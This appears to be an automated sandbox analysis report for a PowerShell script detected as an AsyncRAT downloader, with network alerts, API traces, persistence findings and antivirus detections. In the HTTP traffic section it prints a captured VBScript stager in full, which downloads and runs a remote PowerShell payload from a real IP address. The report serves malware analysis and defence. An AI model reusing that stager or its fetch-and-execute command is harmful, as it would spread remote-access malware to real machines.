Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	April 28, 2025, 10:09 a.m.	April 28, 2025, 10:18 a.m.

Size	1.3KB
Type	ASCII text, with CRLF line terminators
MD5	`e4ea2ac8d2a17b90650633ce30c5d7cd`
SHA256	`23595aa0726cb2922cb947269fb1f3f29e26250a61ff6db6986105247b9f3d9d`
CRC32	`6D3AD8A9`
ssdeep	`24:DFCJlXNLyzkgVdy9LqrykV9Qd6HrYORNO37Jx2xmfS02dguLCASxyFP37ZtSNjWC:DFCPNLyAJLqNLQd6H8gE7J88sd9L1F36`
Yara	None matched

powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy unrestricted -File C:\Users\test22\AppData\Local\Temp\namen.ps1
2576

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
185.39.17.70	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49163 -> 185.39.17.70:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 185.39.17.70:80 -> 192.168.56.101:49163	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 185.39.17.70:80 -> 192.168.56.101:49163	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 185.39.17.70:80 -> 192.168.56.101:49163	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.101:49163 -> 185.39.17.70:80	2027260	ET INFO Dotted Quad Host VBS Request	Potentially Bad Traffic
TCP 185.39.17.70:80 -> 192.168.56.101:49163	2026995	ET HUNTING PowerShell DownloadString Command Common In Powershell Stagers	Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Queries for the computername (1 event)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW April 28, 2025, 10:09 a.m.	computer_name: TEST22-PC	1	1	0

Command line console output was observed (8 events)

Time & API	Arguments	Status	Return
WriteConsoleW April 28, 2025, 10:09 a.m.	buffer: Exception calling "Load" with "1" argument(s): "Could not load file or assembly console_handle: 0x00000023	1	1
WriteConsoleW April 28, 2025, 10:09 a.m.	buffer: '487328 bytes loaded from System.Management.Automation, Version=1.0.0.0, Cultu console_handle: 0x0000002f	1	1
WriteConsoleW April 28, 2025, 10:09 a.m.	buffer: re=neutral, PublicKeyToken=31bf3856ad364e35' or one of its dependencies. An att console_handle: 0x0000003b	1	1
WriteConsoleW April 28, 2025, 10:09 a.m.	buffer: empt was made to load a program with an incorrect format." console_handle: 0x00000047	1	1
WriteConsoleW April 28, 2025, 10:09 a.m.	buffer: At C:\Users\test22\AppData\Local\Temp\namen.ps1:30 char:46 console_handle: 0x00000053	1	1
WriteConsoleW April 28, 2025, 10:09 a.m.	buffer: + return [System.Reflection.Assembly]::Load <<<< ($bK) console_handle: 0x0000005f	1	1
WriteConsoleW April 28, 2025, 10:09 a.m.	buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException console_handle: 0x0000006b	1	1
WriteConsoleW April 28, 2025, 10:09 a.m.	buffer: + FullyQualifiedErrorId : DotNetMethodException console_handle: 0x00000077	1	1

Uses Windows APIs to generate a cryptographic key (6 events)

Time & API	Arguments	Status	Return
CryptExportKey April 28, 2025, 10:09 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c28e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2025, 10:09 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c28e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2025, 10:09 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c28e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2025, 10:09 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c28e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2025, 10:09 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c28e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2025, 10:09 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c28e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx April 28, 2025, 10:09 a.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (2 events)

suspicious_features	GET method with no useragent header, Connection to IP address				suspicious_request	GET http://185.39.17.70/zgrnf/pixel.exe
suspicious_features	GET method with no useragent header, Connection to IP address				suspicious_request	GET http://185.39.17.70/zgrnf/nums.vbs

Performs some HTTP requests (2 events)

request	GET http://185.39.17.70/zgrnf/pixel.exe
request	GET http://185.39.17.70/zgrnf/nums.vbs

Allocates read-write-execute memory (usually to unpack itself) (28 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory April 28, 2025, 10:09 a.m.	process_identifier: 2576 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0269b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:09 a.m.	process_identifier: 2576 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026af000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:09 a.m.	process_identifier: 2576 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f29000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:09 a.m.	process_identifier: 2576 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05610000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:09 a.m.	process_identifier: 2576 region_size: 327680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:09 a.m.	process_identifier: 2576 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:09 a.m.	process_identifier: 2576 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:09 a.m.	process_identifier: 2576 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef30000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:09 a.m.	process_identifier: 2576 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:09 a.m.	process_identifier: 2576 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05611000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:09 a.m.	process_identifier: 2576 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05476000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:09 a.m.	process_identifier: 2576 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05477000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:09 a.m.	process_identifier: 2576 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05620000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:09 a.m.	process_identifier: 2576 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028f2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:09 a.m.	process_identifier: 2576 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:09 a.m.	process_identifier: 2576 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05478000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:09 a.m.	process_identifier: 2576 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05479000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:09 a.m.	process_identifier: 2576 region_size: 589824 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a70000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:09 a.m.	process_identifier: 2576 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ac0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:09 a.m.	process_identifier: 2576 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ac1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:09 a.m.	process_identifier: 2576 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ac2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:09 a.m.	process_identifier: 2576 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ac3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:09 a.m.	process_identifier: 2576 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ac4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:09 a.m.	process_identifier: 2576 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05612000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:09 a.m.	process_identifier: 2576 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05613000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:09 a.m.	process_identifier: 2576 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05614000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:09 a.m.	process_identifier: 2576 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05615000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2025, 10:09 a.m.	process_identifier: 2576 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05621000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates executable files on the filesystem (1 event)

file	C:\Windows\Temp\nums.vbs

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses April 28, 2025, 10:09 a.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (3 events)

Data received	(((( ( ((( ((((((((((((((((((( (!("(#($(%(&('((()((+(,(-(.(/(0(1(2(3(4(5(6(7(8(9(:(;(<(=(>(?(@(A(B(C(D(E(F(G(H(I(J(K(L(M(N(O(P(Q(R(S(T(U(V(W(X(Y(Z([(\(](^(_(`(a(b(c(d(e(f(g(h(i(j(k(l(m(n(o(p(q(r(s(t(u(v(w(x(y(z({(\|(}(~(((((((((((((((((((((((((((((((((( (¡(¢(£(¤(¥(¦(§(¨(©(ª(«(¬((®(¯(°(±(²(³(´(µ(¶(·(¸(¹(º(»(¼(½(¾(¿(À(Á(Â(Ã(Ä(Å(Æ(Ç(È(É(Ê(Ë(Ì(Í(Î(Ï(Ð(Ñ(Ò(Ó(Ô(Õ(Ö(×(Ø(Ù(Ú(Û(Ü(Ý(Þ(ß(à(á(â(ã(ä(å(æ(ç(è(é(ê(ë(ì(í(î(ï(ð(ñ(ò(ó(ô(õ(ö(÷(ø(ù(ú(û(ü(ý(þ(ÿ(((((((((( ( ((( ((((((((((((((((((( (!("(#($(%(&('((()(*(+(,(-(.(/(0(1(2(3(4(5(6(7(8(9(:(;(<(=(>(?(@(A(B(C(D(E(F(G(H(I(J(K(L(M(N(O(P(Q(R(S(T(U(V(W(X(Y(Z([(\(](^(_(`(a(b(c(d(e(f(g(h(i(j(k(l(m(n(o(p(q(r(s(t(u(v(w(x(y(z({(\|(}(~(((((((((((((((((((((((((((((((((( (¡(¢(£(¤(¥(¦(§(¨(©(ª(«(¬((®(¯(°(±(²(³(´(µ(¶*(·
Data received	KmAggZpXwnfmusgZJCfSNwhYhZpzLMpHxZhZpOliuDKthZrETnAJYGiZIFsFugYJiZnbnnHyqKiZGEeZAfNPiZeReEuVbTiZTOuYTGGXiZoeYRGYbZiZUqTBsuUbiZLVxchUjdiZWcGTElVkiZvFCywfMoiZcBPxuXVOjZEZdMWLhQjZvpinNWpQjZiYhGWHJAkZEbPvFjWIkZYfgpItZSkZfxPFcSxZkZjRYGHLgckZMWKFFXapkZlbLDfUhDlZKpWfNLdhlZqHWfpWXolZvxCqDHzEmZAFPQQcEdmZxxhqcmlKnZuOEAfzQXnZUMDPPQSknZSbhrVIhonZSRGmCVGynZSmpjwOGToZEsHQCiNboZUuoppLoroZXoTeSenOpZxbsRuNbWpZSyATvKLYpZlRpiSioepZApfGVmVupZKkIhmelBqZkvjrDWbIqZMWTgmAnIqZRjsaGZihqZGdKUPtgjqZMXjxHaOvqZKLytRlrIrZsoeWXQkJrZcdOoAgwLrZiFCOvEgarZUOFfwQOkrZSofTAjxDsZXdiZSwAIsZrzfhVwmIsZgWXUFOfTsZtoFopPJbsZSFteLehgsZcUpEbFaosZWgJAelNrsZNKEhAHmssZJKojabFwsZutoqqeHGtZWEGYmTNItZmYIGPibKtZpSNeRFXetZFZOWBNtttZYQocQgJGuZfPbWZxKUuZdOrxwjbjuZyWKPupvjuZEGXHNXMouZBEBKWZVwuZOynPPrGNvZYkOtMVMNvZmNAouAsSvZwBWubfNjvZoAezuqcovZYfqhNWQwvZmtlmSavDwZTLPnzpSWwZixXHuuSbwZPYrhGeurwZVRRYXBWswZtpvLLvrywZMBzTZImExZsivjvjRGxZdmdyLbONxZzfdzKEQZxZnfsAonjcxZdoMoGKqjxZnoguwlUoxZYVFTKXCAyZHkVLTWFAyZALWnPMFOyZyGkIArKWyZuZdmmBeZyZmWTWpbTgyZsumqhhdmyZeVxfoMMFzZCZjrKXkHzZdWuQFbxjzZZGhFVeWxzZsKJEslayzZejQwLlDQAaUqhrPMUbAakiNlkrBJBahKBEOOYgBaDfkanOwwBaKDHeKTRzBazoUxoykbCarjDNMABXDatnuGBpAYDajCxbmRTYDahOpaVRbqDanyYXgtpwDatuCpElGCEaplLngTHREapemtjdnREaacXQRPlSEaMikSUYguEarasQgoCHFapbQANPIqFalCGTarWqFaBGscJoNuFanRNxHyeLGaVVFOljtsGaywKSaHbcHaJlPsCPDfHatdJCunnmHaHlOIdAhaIaO
Data received	HTTP/1.1 200 OK Content-Type: text/vbscript Last-Modified: Wed, 23 Apr 2025 11:11:03 GMT Accept-Ranges: bytes ETag: "481fcc6640b4db1:0" Server: Microsoft-IIS/10.0 Date: Mon, 28 Apr 2025 01:16:14 GMT Content-Length: 419 Set xAbcYz = CreateObject("WScript.Shell") q1 = "powershell" q2 = "-Command" q3 = "$" & Chr(97) & "x = New-Object Net.WebClient;" q4 = "$" & Chr(98) & "x = $" & Chr(97) & "x.DownloadString(" q5 = "'" & "http://185.39.17.70/zgrnf/pik.ps1" & "'" q6 = ");" q7 = "[ScriptBlock]::Create($" & Chr(98) & "x).Invoke()" finalCmd = q1 & " " & q2 & " """ & q3 & q4 & q5 & q6 & q7 & """" xAbcYz.Run finalCmd, 0, True

Poweshell is sending data to a remote host (2 events)

Data sent	GET /zgrnf/pixel.exe HTTP/1.1 Host: 185.39.17.70 Connection: Keep-Alive
Data sent	GET /zgrnf/nums.vbs HTTP/1.1 Host: 185.39.17.70

Communicates with host for which no DNS query was performed (1 event)

host

185.39.17.70

Installs itself for autorun at Windows startup (1 event)

file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\App.url

File has been identified by 19 AntiVirus engines on VirusTotal as malicious (19 events)

CTX	powershell.trojan.asyncrat
ALYac	Trojan.GenericKD.76289393
VIPRE	Trojan.GenericKD.76289393
Arcabit	Trojan.Generic.D48C1571
Symantec	Trojan.Gen.NPE
ESET-NOD32	GenScript.QHM
Avast	Script:SNH-gen [Trj]
Kaspersky	HEUR:Trojan.PowerShell.Generic
BitDefender	Trojan.GenericKD.76289393
MicroWorld-eScan	Trojan.GenericKD.76289393
Emsisoft	Trojan.GenericKD.76289393 (B)
Google	Detected
Antiy-AVL	Trojan[Downloader]/PowerShell.AsyncRAT
Microsoft	TrojanDownloader:PowerShell/AsyncRAT.LJC!MTB
GData	Trojan.GenericKD.76289393
Ikarus	Trojan-Downloader.PowerShell.AsyncRAT
Tencent	Win32.Trojan.Generic.Ftgl
huorong	Trojan/PS.Agent.ax
AVG	Script:SNH-gen [Trj]

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (2 events)

Time & API	Arguments	Status	Return	Repeated
send April 28, 2025, 10:09 a.m.	buffer: GET /zgrnf/pixel.exe HTTP/1.1 Host: 185.39.17.70 Connection: Keep-Alive socket: 1540 sent: 77	1	77	0
send April 28, 2025, 10:09 a.m.	buffer: GET /zgrnf/nums.vbs HTTP/1.1 Host: 185.39.17.70 socket: 1540 sent: 52	1	52	0

namen.ps1

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All